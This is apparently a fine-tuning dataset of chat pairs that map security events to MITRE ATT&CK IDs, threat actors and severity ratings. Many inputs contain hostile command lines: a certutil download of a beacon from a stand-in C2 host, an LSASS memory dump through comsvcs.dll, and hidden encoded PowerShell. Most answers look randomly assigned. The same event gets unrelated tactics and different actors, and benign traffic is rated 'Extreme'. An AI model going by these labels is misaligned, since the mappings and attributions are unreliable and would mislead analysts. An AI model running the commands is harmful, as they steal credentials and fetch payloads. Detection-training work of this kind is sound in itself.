messages
listlengths
2
2
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1688 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.127.179.114", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT41\", ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.25.55.23", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techni...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.63.31.75", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0001\", \"TA0010\"], \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confide...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Leafminer used a tool called MailSniper to search through the Exchange server mailboxes for keywords.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1114\", \"T1114.002\"]}", "role": "...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2444 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.121.249.22", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confid...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including K...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3361 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1357 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.195.73.40", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-S4Y74FVNJS)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"Ex...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Spid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-18NAXUCHHL)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"High\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2726 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.193.229.161", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-4MQS0VUF4W)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Command and Control, Credential Access", "role": ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: OnionDuke has the capability to use a Denial of Service module.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1499\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confid...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: SILENTTRINITY can scan for open ports on a compromised machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1046\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-E790YR071X)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Collection, Credential Access, Impact", "role": "user" }, { "co...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.36.110.220", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-H0J28EA0IZ)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Command and Control, Credential Access, Reconnaissance", "role": "user" }...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: These programs will be executed under the context of the user and will have the account's associated permissions level.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniqu...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.33.53.172", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0001\"]...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-M540LWH6A9)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Command and Control, Impact, Exfiltration", "role": "user" }, { "co...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.73.155.31", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0043\", \"TA0007\"], \"te...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: StreamEx has the ability to remotely execute commands.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1830 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-Z5F1GPZP6T)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"Critical\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.27.200.143", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0001...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.110.203.177", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1778 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: MBR + overwrite/wipe", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1561\", \"T1561.002\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.137.179.26", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0043\", \"TA0002\"]...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\\NTDS\\Ntds.dit of a domain controller.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003.003\", \"T1003\"]}"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-TR5EUTFYD2)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Exfiltration, Credential Access", "role": "user...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-V3OZVILXEK)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Impact, Exfiltration, Collection", "role": "user" }, { "content": ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: OopsIE performs several anti-VM and sandbox checks on the victim's machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0007\"], \"techniques\": [\"T1497\", \"T1497.001\"]}", "rol...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 962 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.177.152.233", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0006\"], ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Deobfuscated, we can see it is the HawkEye Keylogger — Reborn v9, Version=9.0.1.6", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1056\"]}", "role": "assistant"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: lists the running processes", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.6.154.28", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-FB39E7ADE9)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Discovery", "role": "user" }, { "content":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-4ZRHJE05MV)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Credential Access", "role": "user" }, { "content": "...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may compromise accounts with services that can be used during targeting.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1586\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: FIN7 has used RDP to move laterally in victim environments.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021.001\", \"T1021\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1659 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confid...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confide...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3213 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.106.245.215", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0005\", \"TA0040\"], \"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.39.236.143", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0007...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-P98Y5MWW40)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Reconnaissance, Impact, Initial Access", "role": "user" }, { "c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-H5YA6R76EH)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Defense Evasion, Command and Control", "role": "user" }, ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.140.242.69", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0040\", \"TA0011\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-YO7PEW4G9S)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Reconnaissance, Collection", "role": "user" }...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.85.68.106", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-PP6F8J7UOW)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Privilege Escalation", "role": "user" }, ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"confidence\":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-PM5D7QE2LS)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content": "{\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3565 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.126.85.189", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The wormDll32 module attempts to identify servers and domain controllers in the network using NetServerEnum and LDAP queries.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T14...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidenc...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-SVVZKG6VUJ)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"Critical\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"c...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.119.139.164", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-1TY1UU4QIT)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": \"C...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1610 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 646 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1814 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The group often uses the trial version of Cobalt Strike, a publicly available commercial software for “Adversary Simulations and Red Team Operations.” Other public tools used by the group are Metasploit, a well-known...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confi...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.29.226.83", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0004\", \"TA0006\"], \"techniques\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-ITBSRSCX3R)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Discovery, Reconnaissance, Impact", "role": "user" }, { "c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1907 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1473 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.60.82.101", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2445 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.78.20.76", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0008\", \"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: The majority of documents used the name “gerry knight” for the author field in the document metadata, and the embedded macros largely used direct IP connections to command and control (C2) servers rather than using d...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: BackdoorDiplomacy has used EarthWorm for network tunneling with a SOCKS5 server and port transfer functionalities.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1095\"]...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges.", "role": "user" }, { "content": "{\"tactics\": [\"T...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-B7X9RFMEHF)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Impact, Defense Evasion", "role": "user" }, { ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 543 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.143.54.19", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0002\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Sidewinder has used tools to obtain the current system time.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1124\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: RemoteCMD can execute commands remotely by creating a new schedule task on the remote system", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"], \"techniques\": [\"T1053.005\",...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: 13 14 ams_api64.dll ams_api32.dll Handy wrapper around API of exXX.dll, pdXX.dll, sgXX.dll", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\", \"TA0005\"], \"techniques\": [\"T1574.001\", \"T1574.002\",...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Audit the Remote Desktop Users group membership regularly.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1563.002\", \"T1021.001\", \"T1021\", \"T1563\"]}", "role":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-WICBJ51B7N)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Execution, Persistence, Reconnaissance", "role": "user" }, { "co...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Patchwork has used spearphishing with links to deliver files with exploits to initial victims.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1566\", \"T1566.002\"]}", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1826 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-IV0G12IM7L)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severi...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: An interesting note on these payloads is that all the Delphi payloads delivered in this campaign were packed with UPX, while none of the other payloads were packed", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-TGF0LZAJH1)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"Extreme\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB/Windows Admin Shares to connected network shares or with authentica...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.126.120.150", "role": "user" }, { "content": "{\"tactics\": [\"TA001...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Also, the use of the mimikatz and pwdump tools suggests the adversary attempts to dump credentials on compromised systems", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.62.139.25", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0011\"], \"techniques\": [\"T1003...